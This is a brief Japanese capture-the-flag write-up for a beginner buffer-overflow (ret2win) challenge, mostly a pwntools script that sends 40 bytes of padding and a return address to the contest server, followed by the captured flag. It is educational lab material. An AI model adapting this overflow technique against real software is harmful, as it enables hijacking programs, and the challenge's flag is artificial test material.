Pwnってこういうのだけじゃないらしいですが,多分これだけでもできればすごいと思います.
実行ファイルchallとそのソースコードsrc.cが配布される。
ソースを見る限り典型的なret2winなのでやる。
おわり
#!python
from pwn import *
target = 'chall'
elf = ELF(target)
local = 0
debug = 0
if local:
io = process(target)
if debug:
gdb.attach(io)
else:
io = remote('beginnersbof.quals.beginners.seccon.jp', 9000)
io.sendlineafter('?', b'100')
payload = b'A'*40
payload += p64(0x4011e6)
io.sendlineafter('?', payload)
io.readline()
print(io.read())
print(io.read())ctf4b{Y0u_4r3_4lr34dy_4_BOF_M45t3r!}